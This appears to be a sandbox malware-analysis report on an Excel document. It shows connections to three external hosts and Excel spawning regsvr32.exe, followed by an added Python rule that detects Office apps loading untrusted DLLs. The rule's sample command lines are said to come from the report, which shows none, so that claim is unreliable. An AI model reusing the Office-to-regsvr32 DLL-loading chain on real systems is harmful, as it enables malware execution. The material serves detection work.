Data Raw: | 40 e0 2e 00 42 4d 36 e0 2e 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 20 03 00 00 01 00 18 00 00 00 00 00 00 e0 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 13, 2022 16:08:25.683748007 CEST | 49173 | 443 | 192.168.2.22 | 31.22.4.117 |
Apr 13, 2022 16:08:25.683832884 CEST | 443 | 49173 | 31.22.4.117 | 192.168.2.22 |
Apr 13, 2022 16:08:25.683964014 CEST | 49173 | 443 | 192.168.2.22 | 31.22.4.117 |
Apr 13, 2022 16:08:25.694847107 CEST | 49173 | 443 | 192.168.2.22 | 31.22.4.117 |
Apr 13, 2022 16:08:25.694915056 CEST | 443 | 49173 | 31.22.4.117 | 192.168.2.22 |
Apr 13, 2022 16:08:25.802860975 CEST | 443 | 49173 | 31.22.4.117 | 192.168.2.22 |
Apr 13, 2022 16:08:25.803271055 CEST | 49173 | 443 | 192.168.2.22 | 31.22.4.117 |
Apr 13, 2022 16:08:25.823371887 CEST | 49173 | 443 | 192.168.2.22 | 31.22.4.117 |
Apr 13, 2022 16:08:25.823404074 CEST | 443 | 49173 | 31.22.4.117 | 192.168.2.22 |
Apr 13, 2022 16:08:25.823813915 CEST | 443 | 49173 | 31.22.4.117 | 192.168.2.22 |
Apr 13, 2022 16:08:25.823899984 CEST | 49173 | 443 | 192.168.2.22 | 31.22.4.117 |
Apr 13, 2022 16:08:26.089989901 CEST | 49173 | 443 | 192.168.2.22 | 31.22.4.117 |
Apr 13, 2022 16:08:26.134196043 CEST | 443 | 49173 | 31.22.4.117 | 192.168.2.22 |
Apr 13, 2022 16:08:26.638818979 CEST | 443 | 49173 | 31.22.4.117 | 192.168.2.22 |
Apr 13, 2022 16:08:26.638957024 CEST | 443 | 49173 | 31.22.4.117 | 192.168.2.22 |
Apr 13, 2022 16:08:26.639058113 CEST | 49173 | 443 | 192.168.2.22 | 31.22.4.117 |
Apr 13, 2022 16:08:26.639100075 CEST | 49173 | 443 | 192.168.2.22 | 31.22.4.117 |
Apr 13, 2022 16:08:26.639482021 CEST | 49173 | 443 | 192.168.2.22 | 31.22.4.117 |
Apr 13, 2022 16:08:26.639522076 CEST | 443 | 49173 | 31.22.4.117 | 192.168.2.22 |
Apr 13, 2022 16:08:26.639554024 CEST | 49173 | 443 | 192.168.2.22 | 31.22.4.117 |
Apr 13, 2022 16:08:26.639612913 CEST | 49173 | 443 | 192.168.2.22 | 31.22.4.117 |
Apr 13, 2022 16:08:27.268148899 CEST | 49174 | 443 | 192.168.2.22 | 192.185.17.132 |
Apr 13, 2022 16:08:27.268199921 CEST | 443 | 49174 | 192.185.17.132 | 192.168.2.22 |
Apr 13, 2022 16:08:27.268280983 CEST | 49174 | 443 | 192.168.2.22 | 192.185.17.132 |
Apr 13, 2022 16:08:27.269045115 CEST | 49174 | 443 | 192.168.2.22 | 192.185.17.132 |
Apr 13, 2022 16:08:27.269062042 CEST | 443 | 49174 | 192.185.17.132 | 192.168.2.22 |
Apr 13, 2022 16:08:27.567006111 CEST | 443 | 49174 | 192.185.17.132 | 192.168.2.22 |
Apr 13, 2022 16:08:27.567137003 CEST | 49174 | 443 | 192.168.2.22 | 192.185.17.132 |
Apr 13, 2022 16:08:27.574062109 CEST | 49174 | 443 | 192.168.2.22 | 192.185.17.132 |
Apr 13, 2022 16:08:27.574089050 CEST | 443 | 49174 | 192.185.17.132 | 192.168.2.22 |
Apr 13, 2022 16:08:27.574388027 CEST | 443 | 49174 | 192.185.17.132 | 192.168.2.22 |
Apr 13, 2022 16:08:27.574462891 CEST | 49174 | 443 | 192.168.2.22 | 192.185.17.132 |
Apr 13, 2022 16:08:27.591192007 CEST | 49174 | 443 | 192.168.2.22 | 192.185.17.132 |
Apr 13, 2022 16:08:27.634186029 CEST | 443 | 49174 | 192.185.17.132 | 192.168.2.22 |
Apr 13, 2022 16:08:29.182924032 CEST | 443 | 49174 | 192.185.17.132 | 192.168.2.22 |
Apr 13, 2022 16:08:29.183068037 CEST | 49174 | 443 | 192.168.2.22 | 192.185.17.132 |
Apr 13, 2022 16:08:29.183773041 CEST | 443 | 49174 | 192.185.17.132 | 192.168.2.22 |
Apr 13, 2022 16:08:29.183835030 CEST | 443 | 49174 | 192.185.17.132 | 192.168.2.22 |
Apr 13, 2022 16:08:29.184253931 CEST | 49174 | 443 | 192.168.2.22 | 192.185.17.132 |
Apr 13, 2022 16:08:29.661552906 CEST | 49175 | 443 | 192.168.2.22 | 162.241.62.76 |
Apr 13, 2022 16:08:29.661657095 CEST | 443 | 49175 | 162.241.62.76 | 192.168.2.22 |
Apr 13, 2022 16:08:29.661747932 CEST | 49175 | 443 | 192.168.2.22 | 162.241.62.76 |
Apr 13, 2022 16:08:29.662199974 CEST | 49175 | 443 | 192.168.2.22 | 162.241.62.76 |
Apr 13, 2022 16:08:29.662235022 CEST | 443 | 49175 | 162.241.62.76 | 192.168.2.22 |
Apr 13, 2022 16:08:29.949445963 CEST | 443 | 49175 | 162.241.62.76 | 192.168.2.22 |
Apr 13, 2022 16:08:29.949579954 CEST | 49175 | 443 | 192.168.2.22 | 162.241.62.76 |
Apr 13, 2022 16:08:29.964890003 CEST | 49175 | 443 | 192.168.2.22 | 162.241.62.76 |
Apr 13, 2022 16:08:29.964926958 CEST | 443 | 49175 | 162.241.62.76 | 192.168.2.22 |
Apr 13, 2022 16:08:29.965326071 CEST | 443 | 49175 | 162.241.62.76 | 192.168.2.22 |
Apr 13, 2022 16:08:29.965420008 CEST | 49175 | 443 | 192.168.2.22 | 162.241.62.76 |
Apr 13, 2022 16:08:29.972403049 CEST | 49175 | 443 | 192.168.2.22 | 162.241.62.76 |
Apr 13, 2022 16:08:30.014192104 CEST | 443 | 49175 | 162.241.62.76 | 192.168.2.22 |
Apr 13, 2022 16:08:31.146747112 CEST | 443 | 49175 | 162.241.62.76 | 192.168.2.22 |
Apr 13, 2022 16:08:31.146872044 CEST | 443 | 49175 | 162.241.62.76 | 192.168.2.22 |
Apr 13, 2022 16:08:31.146892071 CEST | 49175 | 443 | 192.168.2.22 | 162.241.62.76 |
Apr 13, 2022 16:08:31.146950960 CEST | 49175 | 443 | 192.168.2.22 | 162.241.62.76 |
Apr 13, 2022 16:08:31.195751905 CEST | 49175 | 443 | 192.168.2.22 | 162.241.62.76 |
Apr 13, 2022 16:08:31.195811987 CEST | 443 | 49175 | 162.241.62.76 | 192.168.2.22 |
Apr 13, 2022 16:08:31.195836067 CEST | 49175 | 443 | 192.168.2.22 | 162.241.62.76 |
Apr 13, 2022 16:08:31.195902109 CEST | 49175 | 443 | 192.168.2.22 | 162.241.62.76 |
Apr 13, 2022 16:10:25.538781881 CEST | 49174 | 443 | 192.168.2.22 | 192.185.17.132 |
Apr 13, 2022 16:10:25.539721966 CEST | 49174 | 443 | 192.168.2.22 | 192.185.17.132 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 13, 2022 16:08:25.633239031 CEST | 55868 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 13, 2022 16:08:25.672044039 CEST | 53 | 55868 | 8.8.8.8 | 192.168.2.22 |
Apr 13, 2022 16:08:27.059580088 CEST | 49688 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 13, 2022 16:08:27.264260054 CEST | 53 | 49688 | 8.8.8.8 | 192.168.2.22 |
Apr 13, 2022 16:08:29.637124062 CEST | 58836 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 13, 2022 16:08:29.654807091 CEST | 53 | 58836 | 8.8.8.8 | 192.168.2.22 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Apr 13, 2022 16:08:25.633239031 CEST | 192.168.2.22 | 8.8.8.8 | 0xe763 | Standard query (0) | A (IP address) | IN (0x0001) | |
Apr 13, 2022 16:08:27.059580088 CEST | 192.168.2.22 | 8.8.8.8 | 0x4650 | Standard query (0) | A (IP address) | IN (0x0001) | |
Apr 13, 2022 16:08:29.637124062 CEST | 192.168.2.22 | 8.8.8.8 | 0xeef8 | Standard query (0) | A (IP address) | IN (0x0001) |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 13, 2022 16:08:25.672044039 CEST | 8.8.8.8 | 192.168.2.22 | 0xe763 | No error (0) | 31.22.4.117 | A (IP address) | IN (0x0001) | ||
Apr 13, 2022 16:08:27.264260054 CEST | 8.8.8.8 | 192.168.2.22 | 0x4650 | No error (0) | 192.185.17.132 | A (IP address) | IN (0x0001) | ||
Apr 13, 2022 16:08:29.654807091 CEST | 8.8.8.8 | 192.168.2.22 | 0xeef8 | No error (0) | 162.241.62.76 | A (IP address) | IN (0x0001) |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49173 | 31.22.4.117 | 443 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-04-13 14:08:26 UTC | 0 | OUT | |
2022-04-13 14:08:26 UTC | 0 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.22 | 49174 | 192.185.17.132 | 443 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-04-13 14:08:27 UTC | 0 | OUT | |
2022-04-13 14:08:29 UTC | 0 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
2 | 192.168.2.22 | 49175 | 162.241.62.76 | 443 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-04-13 14:08:29 UTC | 1 | OUT | |
2022-04-13 14:08:31 UTC | 1 | IN |
Target ID: | 0 |
Start time: | 16:08:16 |
Start date: | 13/04/2022 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f660000 |
File size: | 28253536 bytes |
MD5 hash: | D53B85E21886D2AF9815C377537BCAC3 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Target ID: | 3 |
Start time: | 16:08:26 |
Start date: | 13/04/2022 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff460000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Target ID: | 6 |
Start time: | 16:08:29 |
Start date: | 13/04/2022 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff460000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Target ID: | 7 |
Start time: | 16:08:31 |
Start date: | 13/04/2022 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff460000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
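The process tree above (EXCEL.EXE spawning three regsvr32.exe instances, each handed a DLL under C:\Uduw) is the part of this chain that is easiest to detect on an endpoint. The Python below is an added example, not part of the Joe Sandbox report: a process-creation rule that fires when an Office application spawns regsvr32.exe or rundll32.exe with a DLL argument outside the Windows and Program Files trees, and that treats the same loaders with an untrusted DLL under a non-Office parent as a lower-priority finding. The event records are constructed to mirror this report's tree; the field names (Image, ParentImage, CommandLine, ProcessId) follow Sysmon Event ID 1 and are an assumption about the log source, rundll32.exe is included as a generalisation of the regsvr32 case shown here, and the explorer.exe and msiexec.exe parents are invented for the benign cases.

```python
"""Process-creation detection for Office -> regsvr32/rundll32 loading an untrusted DLL.

Added example, not part of the report. Event field names follow Sysmon Event ID 1
(assumption about the log source); the benign events are constructed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
LOADERS = {"regsvr32.exe", "rundll32.exe"}      # rundll32 added as a generalisation of the page's case
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
DLL_RE = re.compile(r'"([^"]+\.dll)"|(\S+\.dll)', re.IGNORECASE)   # quoted or bare DLL path


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def dll_arguments(cmdline: str) -> list[str]:
    """Every .dll path on the command line, quotes stripped."""
    return [quoted or bare for quoted, bare in DLL_RE.findall(cmdline)]


def in_trusted_dir(path: str) -> bool:
    return path.lower().startswith(TRUSTED_DIRS)


@dataclass
class Alert:
    pid: int
    severity: str
    reason: str
    dll: str


def evaluate(event: dict) -> Alert | None:
    image = basename(event["Image"])
    if image not in LOADERS:
        return None
    parent = basename(event["ParentImage"])
    dlls = dll_arguments(event["CommandLine"])
    untrusted = [d for d in dlls if not in_trusted_dir(d)]
    pid = event["ProcessId"]
    if parent in OFFICE_APPS and untrusted:
        return Alert(pid, "high", f"{parent} spawned {image} with a DLL outside trusted directories", untrusted[0])
    if parent in OFFICE_APPS:
        return Alert(pid, "medium", f"{parent} spawned {image}", dlls[0] if dlls else "")
    if untrusted:
        return Alert(pid, "low", f"{image} loading a DLL outside trusted directories", untrusted[0])
    return None


def run_rule(events: list[dict]) -> list[Alert]:
    return [a for a in map(evaluate, events) if a]


EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
REGSVR = r"C:\Windows\System32\regsvr32.exe"
EVENTS = [
    # Mirrors the report's tree (PIDs and command lines from the page; explorer.exe parent assumed).
    {"ProcessId": 1056, "Image": EXCEL, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f'"{EXCEL}" /automation -Embedding'},
    {"ProcessId": 1036, "Image": REGSVR, "ParentImage": EXCEL, "CommandLine": r"regsvr32 C:\Uduw\ehxw1.dll"},
    {"ProcessId": 1424, "Image": REGSVR, "ParentImage": EXCEL, "CommandLine": r"regsvr32 C:\Uduw\ehxw2.dll"},
    {"ProcessId": 1696, "Image": REGSVR, "ParentImage": EXCEL, "CommandLine": r"regsvr32 C:\Uduw\ehxw3.dll"},
    # Constructed benign case: an installer registering a vendor COM server from Program Files.
    {"ProcessId": 4242, "Image": REGSVR, "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'regsvr32 /s "C:\Program Files\Vendor\vendor.dll"'},
    # Constructed grey case: user-writable path but no Office parent.
    {"ProcessId": 4343, "Image": REGSVR, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"regsvr32 /s C:\Users\bob\AppData\Local\Temp\setup.dll"},
]

if __name__ == "__main__":
    for alert in run_rule(EVENTS):
        print(f"[{alert.severity:>6}] pid={alert.pid} {alert.reason}: {alert.dll}")
```

The high-severity branch is the one that matches this sample; in the sandbox all three regsvr32 instances also ran with administrator privileges, so the registered DLLs get whatever the user has. The low branch will be noisy on hosts where installers register COM servers from temp directories, which is why it is kept separate from the Office-parent case rather than merged into it.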